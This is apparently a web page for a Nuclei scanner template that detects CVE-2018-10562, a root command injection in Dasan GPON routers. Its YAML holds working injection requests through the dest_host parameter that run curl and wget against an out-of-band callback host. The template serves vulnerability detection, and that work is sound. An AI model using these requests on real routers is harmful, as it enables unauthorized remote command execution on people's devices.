Dasan GPON Devices - Remote Code Execution

ID: CVE-2018-10562

Severity: critical

Author: gy741

Tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks

Description

Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output.

YAML Source

id: CVE-2018-10562

info:
  name: Dasan GPON Devices - Remote Code Execution
  author: gy741
  severity: critical
  description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router
    - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10562
    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
    - https://github.com/ethicalhackeragnidhra/GPON
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-10562
    cwe-id: CWE-78
    epss-score: 0.97423
    epss-percentile: 0.99934
    cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: dasannetworks
    product: gpon_router_firmware
  tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks
variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /GponForm/diag_Form?images/ HTTP/1.1
        Host: {{Hostname}}

        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0
      - |
        POST /GponForm/diag_Form?images/ HTTP/1.1
        Host: {{Hostname}}

        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 490a004630440220590c8ab09f58ffdf88c508ebf131b3517a69124c3bf9faca921d3a2d9a406e6b02200e1e4f94d6ca3ac13c887f7c008eb2c873672361a57e906ff19132763d1298d8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-10562.yaml"

View on Github